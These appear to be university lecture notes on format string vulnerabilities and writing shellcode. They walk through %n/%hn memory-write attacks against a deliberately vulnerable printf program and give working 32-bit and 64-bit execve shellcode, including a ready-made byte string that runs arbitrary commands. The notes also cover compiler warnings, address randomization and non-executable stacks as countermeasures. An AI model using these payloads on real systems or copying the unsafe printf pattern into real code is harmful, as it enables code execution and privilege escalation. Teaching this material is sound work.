Week 4: Format Strings and Shellcode

Format String Vulnerability

Outline
  • Format String
  • Access optional arguments
  • How printf() works
  • Format string attack
  • How to exploit the vulnerability
  • Countermeasures
Format String
  • printf(): Prints a string according to a format.
    int printf(const char *format, ...);
  • Argument list of printf() consists of:
    • One concrete argument format
    • Zero or more optional arguments
  • Compilers don’t complain if fewer arguments are passed to printf() during invocation.
Access Optional Arguments
  • myprintf() shows how printf() actually works.
  • Consider myprintf() invoked in line 7.
  • va_list pointer (line 1) accesses the optional arguments.
  • va_start() macro (line 2) calculates the initial position of va_list from its second argument, Narg (the last named argument before the optional arguments begin).
  • va_start() macro gets the start address of Narg, finds its size based on the data type, and sets the va_list pointer to the position right after it.
  • va_list pointer advances using va_arg() macro.
  • va_arg(ap, int): Returns the int that ap (the va_list pointer) points to and moves ap up by 4 bytes.
  • When all the optional arguments are accessed, va_end() is called.
How printf() Accesses Optional Arguments
  • printf() has three optional arguments.
  • Elements starting with “%” are called format specifiers.
  • printf() scans the format string and prints out each character until “%” is encountered.
  • For each format specifier, printf() calls va_arg(), which returns the optional argument pointed to by va_list and advances it to the next argument.
  • When printf() is invoked, the arguments are pushed onto the stack in reverse order.
  • When it scans and prints the format string, printf() replaces %d with the value from the first optional argument and prints out the value.
  • va_list is then moved to the position 2.
  • va_arg() macro cannot tell whether it has reached the end of the optional argument list.
  • It continues fetching data from the stack and advancing the va_list pointer.
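The walk described above can be imitated with a toy model. This is only a sketch, not how libc implements printf(): the function name toy_printf, the list standing in for the stack, and the sample values are all assumptions made for illustration.

```python
def toy_printf(fmt, stack):
    """Toy model of printf(): `stack` lists the words above the format-string argument."""
    out = []
    ap = 0  # plays the role of the va_list pointer (an index into `stack`)
    i = 0
    while i < len(fmt):
        if fmt[i] == "%" and i + 1 < len(fmt) and fmt[i + 1] in "dx":
            value = stack[ap]      # va_arg(): fetch the word ap points to ...
            ap += 1                # ... and advance to the next word
            out.append(str(value) if fmt[i + 1] == "d" else format(value, "x"))
            i += 2
        else:
            out.append(fmt[i])     # ordinary character: print it as-is
            i += 1
    return "".join(out)


# Two real arguments followed by unrelated stack contents (hypothetical values).
stack = [5, 4, 0x11223344, 0xBFFFF304]
print(toy_printf("a=%d b=%d", stack))        # specifiers match the two arguments
print(toy_printf("a=%d b=%d c=%x", stack))   # third specifier reads past the arguments
```

The second call has one specifier too many, so the model returns whatever word happens to sit after the real arguments, which is the behavior the format string attacks rely on.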
Format String Vulnerability
  • If user_input contains format specifiers, it becomes part of a format string.
Vulnerable Code Example
#include <stdio.h>
void fmtstr()
{
    char input [100];
    int var=0x11223344;

    /* print out information for experiment purpose */
    printf("Target address: %x\n", (unsigned) &var);
    printf("Data at target address: 0x%x\n", var);

    printf("Please enter a string: ");
    fgets (input, sizeof (input)-1, stdin);
    printf(input); // The vulnerable place
    printf("Data at target address: 0x%x\n", var);
}
int main(void) { fmtstr(); return 0; }
  • Inside printf(), the starting point of the optional arguments (va_list pointer) is the position right above the format string argument.
What Can We Achieve?
  • Attack 1: Crash program
  • Attack 2: Print out data on the stack
  • Attack 3: Change the program’s data in the memory
  • Attack 4: Change the program’s data to a specific value
  • Attack 5: Inject Malicious Code
Attack 1: Crash Program
  • Use input: %s%s%s%s%s%s%s%s
  • printf() parses the format string.
  • For each %s, it fetches the value that va_list points to and advances va_list to the next position.
  • Since %s interprets the value as an address and fetches data from that address, providing an invalid address will cause the program to crash.
Attack 2: Print Out Data on the Stack
  • To print out a secret variable on the stack:
  • Use user input: %x%x%x%x%x%x%x%x
  • printf() prints out the integer value pointed to by va_list pointer and advances it by 4 bytes.
  • The number of %x specifiers is determined by the distance between the starting point of the va_list pointer and the variable, achievable through trial and error.
Attack 3: Change Program’s Data in the Memory
  • Goal: change the value of var variable from 0x11223344 to some other value.
  • %n: Writes the number of characters printed out so far into memory.
  • printf("hello%n", &i) ⇒ When printf() gets to %n, it has already printed 5 characters, so it stores 5 to the provided memory address.
  • %n treats the value pointed to by the va_list pointer as a memory address and writes into that location.
  • If we want to write a value to a memory location, we need to have its address on the stack.
  • The address of var is provided at the beginning of the input so that it is stored on the stack.
  • $(command): Command substitution. The output of the command replaces the command itself.
  • \x04: Denotes the single byte with value 0x04, not the two ASCII characters '0' and '4'.
  • Assume the address of var is 0xbffff304 (it can be obtained using gdb).
  • var's address (0xbffff304) is on the stack.
  • Goal: To move the va_list pointer to this location and then use %n to store some value.
  • %x is used to advance the va_list pointer.
  • Using trial and error, check how many %x are needed to print out 0xbffff304.
  • If 6 %x format specifiers are needed, use 5 %x and 1 %n.
  • After the attack, data in the target address is modified to 0x2c (44 in decimal), because 44 characters have been printed out before %n.
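A minimal sketch of how such an input could be assembled and why 44 comes out. The address and the specifier count are taken from the example above; writing each skipping specifier as %.8x (exactly 8 printed characters each) is an assumption, chosen because it is consistent with the count of 44.

```python
import struct

TARGET_ADDR = 0xBFFFF304   # address of var, taken from the example above
NUM_SPECIFIERS = 6         # found by trial and error in the example

# Little-endian address bytes go first so that they end up on the stack.
addr_bytes = struct.pack("<I", TARGET_ADDR)

# Assumption: each skipping specifier is %.8x, which prints exactly 8 hex digits.
payload = addr_bytes + b"%.8x" * (NUM_SPECIFIERS - 1) + b"%n"

# Characters printed before %n: the 4 address bytes plus 8 per %.8x.
printed_before_n = len(addr_bytes) + 8 * (NUM_SPECIFIERS - 1)

print(payload)
print(printed_before_n, hex(printed_before_n))
```

On a different build the number of specifiers and the address would have to be found again.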
Attack 4: Change Program’s Data to a Specific Value
  • Goal: To change the value of var from 0x11223344 to 0x9896a9
  • printf() has already printed out 41 characters before %.10000000x, so, 10000000+41 = 10000041 (0x9896a9) will be stored in 0xbffff304.
Attack 4: A Faster Approach
  • Goal: change the value of var to 0x66887799
  • Use %hn to modify the var variable two bytes at a time.
  • Break the memory of var into two parts, each with two bytes.
  • x86 machines are little-endian, so the least significant bytes are stored at the lower address:
    • The 2 least significant bytes (0x7799) are stored at address 0xbffff304
    • The 2 most significant bytes (0x6688) are stored at 0xbffff306
  • If the first %hn gets value x, and before the next %hn, t more characters are printed, the second %hn will get value x+t.
  • Overwrite the bytes at 0xbffff306 with 0x6688.
  • Print some more characters so that when we reach 0xbffff304, the number of characters will be increased to 0x7799.
  • The attack format consists of:
    • Address A: address of the two most significant bytes of var, 0xbffff306 (4 chars)
    • @@@@: 4 filler chars placed between the two addresses
    • Address B: address of the two least significant bytes of var, 0xbffff304 (4 chars)
    • 4 %.8x: To move va_list to reach Address A (trial and error, 4x8 = 32 chars)
    • 5 _: 5 chars
    • Total: 12 + 5 + 32 = 49 chars
  • To print 0x6688 (26248), we need 26248 - 49 = 26199 characters as a precision field of %x.
  • If a second %hn immediately followed the first (with the two addresses adjacent), va_list would point to the second address and the same value would be stored.
  • Hence, put @@@@ between the two addresses so that one more %x can be inserted to increase the number of printed characters to 0x7799.
  • After the first %hn, the va_list pointer points to @@@@; the extra %x consumes it and advances the pointer to the second address. Its precision field is set to 4368 = 30617 - 26248 - 1 so that 0x7799 (30617) characters have been printed when the second %hn is reached.
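The arithmetic above can be captured in a small helper. This is a sketch: the function name hn_precisions and its parameters are hypothetical, and gap_chars models the single extra character that the source's "- 1" accounts for between the first %hn and the second wide %x.

```python
def hn_precisions(first_value, second_value, printed_so_far, gap_chars=1):
    """Return the precision fields of the two wide %x specifiers.

    first_value / second_value: 16-bit values stored by the first and second %hn.
    printed_so_far: characters already printed before the first wide %x.
    gap_chars: literal characters printed between the first %hn and the second wide %x.
    """
    if not printed_so_far < first_value < second_value:
        raise ValueError("the %hn counter only grows; write the smaller value first")
    first = first_value - printed_so_far
    second = second_value - first_value - gap_chars
    if min(first, second) < 8:
        raise ValueError("a precision below 8 may not print an exact character count")
    return first, second


# 12 address/filler characters + 4 x 8 from the %.8x specifiers + 5 underscores.
prefix = 12 + 4 * 8 + 5
print(hn_precisions(0x6688, 0x7799, prefix))
```

The same helper applies to any pair of 16-bit values as long as the smaller one is written first.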
Attack 5: Inject Malicious Code
  • Goal: Modify the return address of the vulnerable code and let it point to the malicious code (e.g., shellcode to execute /bin/sh). Get root access if the vulnerable code is a SET-UID program.
  • Challenges:
    • Inject Malicious code in the stack
    • Find starting address (A) of the injected code
    • Find return address (B) of the vulnerable code
    • Write value A to B
  • Use gdb to get the return address and the start address of the malicious code.
  • Assume that the return address is stored at 0xbffff38c
  • Assume that the start address of the malicious code is 0xbffff358
  • Goal: Write the value 0xbffff358 to address 0xbffff38c
    • Break 0xbffff38c into two contiguous 2-byte memory locations: 0xbffff38c and 0xbffff38e
    • Store 0xbfff into 0xbffff38e and 0xf358 into 0xbffff38c
  • Number of characters printed before the first %hn = 12 + (4x8) + 5 + 49102 = 49151 (0xbfff).
  • After the first %hn, 13144 + 1 = 13145 more characters are printed.
  • 49151 + 13145 = 62296 (0xf358) is written to 0xbffff38c.
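A sketch of how the two 2-byte writes can be planned and checked. The helper names plan_hn_writes and apply_writes are hypothetical; the addresses are the assumed values from this example. Because the %hn counter only increases, the smaller half is written first.

```python
import struct


def plan_hn_writes(target_addr, value):
    """Split a 32-bit value into two %hn writes, smaller half first."""
    low, high = value & 0xFFFF, value >> 16
    # Little-endian: the low half lives at target_addr, the high half 2 bytes later.
    writes = [(target_addr, low), (target_addr + 2, high)]
    return sorted(writes, key=lambda w: w[1])


def apply_writes(writes, target_addr):
    """Replay the writes on a 4-byte buffer and return the resulting 32-bit value."""
    memory = bytearray(4)
    for addr, half in writes:
        offset = addr - target_addr
        memory[offset:offset + 2] = struct.pack("<H", half)
    return struct.unpack("<I", bytes(memory))[0]


RET_ADDR = 0xBFFFF38C    # where the return address is stored (assumed in the example)
CODE_ADDR = 0xBFFFF358   # start of the injected code (assumed in the example)

writes = plan_hn_writes(RET_ADDR, CODE_ADDR)
for addr, half in writes:
    print(hex(addr), hex(half), half)
print(hex(apply_writes(writes, RET_ADDR)))
```

The plan lists 0xbfff for 0xbffff38e first and 0xf358 for 0xbffff38c second, matching the order used above.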
Countermeasures: Developer
  • Avoid using untrusted user inputs for format strings in functions like printf, sprintf, fprintf, vprintf, scanf, vfscanf.
Countermeasures: Compiler
  • Compilers can detect potential format string vulnerabilities.
  • Use two compilers to compile the program: gcc and clang.
  • There should be a mismatch in the format string.
  • With default settings, both compilers give warnings for the first printf().
  • No warning was given out for the second one.
  • With the option -Wformat=2, both compilers give warnings for both printf statements, stating that the format string is not a string literal.
  • These warnings only remind developers of a potential problem; the compilers still compile the program.
Other Countermeasures
  • Address randomization: Makes it difficult for the attackers to guess the address of the target memory (return address, address of the malicious code)
  • Non-executable Stack/Heap: Prevents injected code from running on the stack or heap, but attackers can use the return-to-libc technique to defeat this countermeasure.
Summary of Format String Vulnerabilities
  • How format string works
  • Format string vulnerability
  • Exploiting the vulnerability
  • Injecting malicious code by exploiting the vulnerability

Shellcode

Outline
  • Challenges in writing shellcode
  • Two approaches
  • 32-bit and 64-bit Shellcode
Introduction
  • In a code injection attack, binary code must be injected
  • Shellcode is a common choice
  • Its goal: get a shell. After that, arbitrary commands can be run
  • Written using assembly code
Writing a Simple Assembly Program
  • Invoke exit()
  • Compilation (32-bit)
    $ nasm -f elf32 -o myexit.o myexit.s
  • Linking to generate final binary
    $ ld -m elf_i386 myexit.o -o myexit
section .text
global _start
_start:
    mov eax, 1
    mov ebx, 0
    int 0x80
  • Consider the following program
int main(int argc, char **argv) {
    char buf[64];
    gets(buf);
}
  • Think about strcpy
THE BASIC IDEA
Writing Shellcode Using C
#include <unistd.h>
void main()
{
    char *argv[2];
    argv[0] = "/bin/sh";
    argv[1] = NULL;
    execve (argv[0], argv, NULL);
}
Getting the Binary Code
$ gcc -m32 shellcode.c
$ objdump -Mintel --disassemble a.out
Writing Shellcode Using Assembly
  • Invoking execve("/bin/sh", argv, 0)
    • eax = 0x0b: execve() system call number
    • ebx = address of the command string "/bin/sh"
    • ecx = address of the argument array argv
    • edx = address of environment variables (set to 0)
Setting ebx
xor eax, eax
push eax
push "//sh"
push "/bin"
mov ebx, esp
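Why "//sh" is pushed before "/bin" can be checked with a small model of the stack. This is only a sketch: the push() helper is hypothetical and models a 32-bit push on a downward-growing stack as prepending 4 bytes.

```python
import struct


def push(stack, dword_bytes):
    """Model a 32-bit push: the stack grows toward lower addresses,
    so newly pushed bytes end up in front of the existing ones."""
    assert len(dword_bytes) == 4
    return dword_bytes + stack


stack = b""
stack = push(stack, struct.pack("<I", 0))  # push eax  (eax = 0, the terminator)
stack = push(stack, b"//sh")               # push "//sh"
stack = push(stack, b"/bin")               # push "/bin"

# esp now points at the first byte of `stack`; reading up to the first zero
# byte gives the C string that ebx refers to.
c_string = stack.split(b"\x00", 1)[0]
print(c_string)

# The 32-bit immediate that encodes the string constant "/bin" (little-endian).
print(hex(struct.unpack("<I", b"/bin")[0]))
```

The extra slash keeps each push at exactly 4 bytes, and the shell treats "/bin//sh" the same as "/bin/sh".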
Setting ecx
argv[0] = address of "/bin//sh"
argv[1] = 0
push eax
push ebx
mov ecx, esp
Setting edx
xor edx, edx
Invoking execve()
xor eax, eax
mov al, 0x0b
int 0x80
Putting Everything Together
xor eax, eax
push eax            ; Use 0 to terminate the string
push "//sh"
push "/bin"
mov ebx, esp        ; Get the string address

push eax            ; argv[1] = 0
push ebx            ; argv[0] points to "/bin//sh"
mov ecx, esp        ; Get the address of argv[]

xor edx, edx        ; edx = 0: no environment variables

xor eax, eax
mov al, 0x0b
int 0x80            ; Invoke execve ()
Compilation and Testing
$ nasm -f elf32 -o shellcode_one.o shellcode_one.s
$ ld -m elf_i386 -o shellcode_one shellcode_one.o
$ echo $$
9650                <-- the current shell's process ID
$ ./shellcode_one
$ echo $$
12380               <-- the current shell's process ID (a new shell)
GETTING RID OF ZEROS FROM SHELLCODE
How to Avoid Zeros
  • Using xor
    • "mov eax, 0": not good, it has zeros in the machine code
    • "xor eax, eax": no zero in the machine code
  • Using instruction with one-byte operand
    • How to save 0x00000099 to eax?
    • "mov eax, 0x99": not good, 0x99 is actually 0x00000099
    • "xor eax, eax; mov al, 0x99": al is the least significant byte of eax
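The claims above can be checked against the machine code directly. The sketch below hard-codes the standard 32-bit x86 encodings of the four instructions; the helper name has_zero_byte is hypothetical.

```python
# Machine code for the 32-bit instructions discussed above (standard x86 encodings).
ENCODINGS = {
    "mov eax, 0":    bytes.fromhex("b800000000"),
    "xor eax, eax":  bytes.fromhex("31c0"),
    "mov eax, 0x99": bytes.fromhex("b899000000"),
    "mov al, 0x99":  bytes.fromhex("b099"),
}


def has_zero_byte(code):
    """Return True if the machine code contains a 0x00 byte."""
    return b"\x00" in code


for asm, code in ENCODINGS.items():
    verdict = "contains zero" if has_zero_byte(code) else "zero-free"
    print(f"{asm:<14} {code.hex():<12} {verdict}")
```

The same check can be run over a whole assembled shellcode before it is used in an attack that copies it with a string function.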
Using Shift Operator
  • How to assign 0x00112233 to ebx?
mov ebx, 0xFF112233
shl ebx, 8
shr ebx, 8
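The effect of the two shifts can be traced with 32-bit arithmetic. This is a sketch: shl32 and shr32 are hypothetical helpers that mimic logical shifts on a 32-bit register.

```python
MASK32 = 0xFFFFFFFF


def shl32(value, bits):
    """Logical shift left in a 32-bit register; bits shifted out are lost."""
    return (value << bits) & MASK32


def shr32(value, bits):
    """Logical shift right in a 32-bit register; zeros enter from the left."""
    return (value & MASK32) >> bits


ebx = 0xFF112233          # mov ebx, 0xFF112233 (no zero byte in the immediate)
ebx = shl32(ebx, 8)       # shl ebx, 8  -> 0x11223300
ebx = shr32(ebx, 8)       # shr ebx, 8  -> 0x00112233
print(f"0x{ebx:08x}")
```

The leading 0xFF is a throwaway byte: any nonzero value works, since the left shift discards it.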
Pushing the "/bin/bash" String Into Stack
  • Without using the // technique
mov edx, "h***"   ; '*' is nonzero filler, removed by the shifts
shl edx, 24       ; shift left for 24 bits
shr edx, 24       ; shift right for 24 bits
push edx          ; edx now contains h\0\0\0
push "/bas"
push "/bin"
mov ebx, esp        ; Get the string address
ANOTHER APPROACH
Getting the Addresses of String and ARGV[]
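  • The data is placed right after a "call" instruction, so "call" pushes the address of the data onto the stack (as its return address)
  • The code at label one pops out the address stored by "call"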
two:
    call one
    db '/bin/sh*'
    db 'AAAA'
    db 'BBBB'
Data Preparation
; Putting a zero at the end of the shell string
xor eax, eax        ; eax contains a zero
mov [ebx+7], al

; Constructing the argument array
mov [ebx+8], ebx
mov [ebx+12], eax
lea ecx, [ebx+8]    ; let ecx = ebx +8
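The effect of these instructions on the data region can be replayed on a byte buffer. This is a sketch: DATA_ADDR is a hypothetical run-time address standing in for the value of ebx.

```python
import struct

DATA_ADDR = 0x08049000   # hypothetical run-time address of the data (value of ebx)
data = bytearray(b"/bin/sh*AAAABBBB")

eax = 0
data[7] = eax & 0xFF                          # mov [ebx+7], al   : '*' -> '\0'
data[8:12] = struct.pack("<I", DATA_ADDR)     # mov [ebx+8], ebx  : argv[0]
data[12:16] = struct.pack("<I", eax)          # mov [ebx+12], eax : argv[1] = 0
ecx = DATA_ADDR + 8                           # lea ecx, [ebx+8]

argv0, argv1 = struct.unpack("<II", data[8:16])
print(bytes(data[:8]), hex(argv0), argv1, hex(ecx))
```

After the three stores, the AAAA and BBBB placeholders hold argv[0] and argv[1], and ecx points at the start of that array.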
Compilation and Testing
  • Error (code region cannot be modified)
$ nasm -f elf32 -o shellcode_two.o shellcode_two.s
$ ld -m elf_i386 -o shellcode_two shellcode_two.o
$ ./shellcode_two
Segmentation fault
  • Make code region writable
$ nasm -f elf32 -o shellcode_two.o shellcode_two.s
$ ld --omagic -m elf_i386 -o shellcode_two shellcode_two.o
$ ./shellcode_two
$                   <-- new shell
64-BIT SHELLCODE
_start:
    xor rdx, rdx          ; 3rd argument (envp) = 0
    push rdx              ; Use 0 to terminate the string
    mov rax, "/bin//sh"
    push rax
    mov rdi, rsp          ; 1st argument: address of "/bin//sh"
    push rdx              ; argv[1] = 0
    push rdi              ; argv[0] points to "/bin//sh"
    mov rsi, rsp          ; 2nd argument: address of argv[]

    xor rax, rax
    mov al, 0x3b          ; execve ( )
    syscall
A Generic Shellcode (64-bit)
  • Goal: execute arbitrary commands
  • /bin/bash -c "<commands>"
Data region
two:
    call one
    db '/bin/bash*'
    db '-c*'
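    ; List of commands, padded with spaces so that the trailing *
    ; sits at offset ARGV-1 (ARGV is 0x48 in the machine code)
    db '/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd     *'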
    db 'AAAAAAAA'    ; Place holder for argv[0] --> "/bin/bash"
    db 'BBBBBBBB'    ; Place holder for argv[1] --> "-c"
    db 'CCCCCCCC'    ; Place holder for argv[2] --> the cmd string
    db 'DDDDDDDD'    ; Place holder for argv[3] --> NULL
Data Preparation (1)
one:
    pop rbx             ; Get the address of the data

    ; Add a zero terminator to each string
    xor rax, rax
    mov [rbx+9], al     ; terminate the "/bin/bash" string
    mov [rbx+12], al    ; terminate the "-c" string
    mov [rbx+ARGV-1], al ; terminate the cmd string
Data Preparation (2)
; Construct the argument arrays
mov [rbx+ARGV], rbx        ; argv[0] --> "/bin/bash"
lea rcx, [rbx+10]
mov [rbx+ARGV+8], rcx     ; argv[1] --> "-c"
lea rcx, [rbx+13]
mov [rbx+ARGV+16], rcx    ; argv[2] --> the cmd string
mov [rbx+ARGV+24], rax    ; argv[3] = 0

; rdi --> "/bin/bash"
mov rdi, rbx
; rsi --> argv[]
lea rsi, [rbx+ARGV]
; rdx = 0
xor rdx, rdx
; execve ()
xor rax, rax
mov al, 0x3b
syscall
Machine Code
shellcode = (
    "\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"
    "\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"
    "\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"
    "\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"
    "/bin/bash*"
    "-c*"
    "/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd     *"
    # The * at the end of the line above serves as the position marker
    "AAAAAAAA"    # Placeholder for argv[0] --> "/bin/bash"
    "BBBBBBBB"    # Placeholder for argv[1] --> "-c"
    "CCCCCCCC"    # Placeholder for argv[2] --> the cmd string
    "DDDDDDDD"    # Placeholder for argv[3] --> NULL
).encode('latin-1')
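Because the machine code uses fixed offsets (9, 12, 0x47 for the terminators and 0x48 for argv[]), a different command has to be padded so that the placeholders stay where they are. The sketch below shows one way to do this; build_data is a hypothetical helper, not part of the original code.

```python
ARGV_OFFSET = 0x48   # offset of the argv[] placeholders, read from the machine code


def build_data(cmd, argv_offset=ARGV_OFFSET):
    """Lay out the data region and pad the command so argv[] starts at argv_offset."""
    head = b"/bin/bash*" + b"-c*"
    # The byte just before argv[] is the '*' marker that becomes the terminator.
    room = argv_offset - len(head) - 1
    if len(cmd) > room:
        raise ValueError(f"command too long: {len(cmd)} > {room} bytes")
    body = cmd.ljust(room, b" ") + b"*"
    placeholders = b"A" * 8 + b"B" * 8 + b"C" * 8 + b"D" * 8
    return head + body + placeholders


data = build_data(b"/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd")
print(data.index(b"AAAAAAAA"))                                   # offset of argv[0]
print(chr(data[9]), chr(data[12]), chr(data[ARGV_OFFSET - 1]))   # the three markers
```

The trailing spaces are harmless, since the shell ignores whitespace at the end of the command string.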
Summary of Shellcode
  • Challenges in writing shellcode
  • Two approaches
  • 32-bit and 64-bit Shellcode
  • A generic shellcode